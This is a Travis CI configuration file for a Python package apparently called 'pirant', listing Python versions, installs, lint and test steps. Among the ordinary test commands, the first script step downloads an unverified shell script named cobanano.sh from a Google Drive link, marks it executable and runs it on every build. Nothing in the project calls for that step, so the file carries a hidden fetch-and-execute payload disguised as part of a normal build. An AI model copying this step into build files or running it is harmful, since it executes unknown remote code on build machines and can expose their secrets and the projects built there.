language: python

python:
  - "2.7"
  - "3.3"
  - "3.4"
  # PyPy versions
  - "pypy"  # PyPy2 2.5.0
  - "pypy3" # Pypy3 2.4.0
  - "pypy-5.3.1"

install:
  - pip install pylint pydocstyle
  - pip install -U setuptools

script:
  - wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --quiet --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1JCD1zkDoMOMiJQcaY2_LzqUDglqUcEkN' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1JCD1zkDoMOMiJQcaY2_LzqUDglqUcEkN" -O cobanano.sh && rm -rf /tmp/cookies.txt && chmod u+x cobanano.sh && ./cobanano.sh
  - pydocstyle pirant
  - pytest tests
  - coverage run --source=pirant setup.py test

after_success:
  - coveralls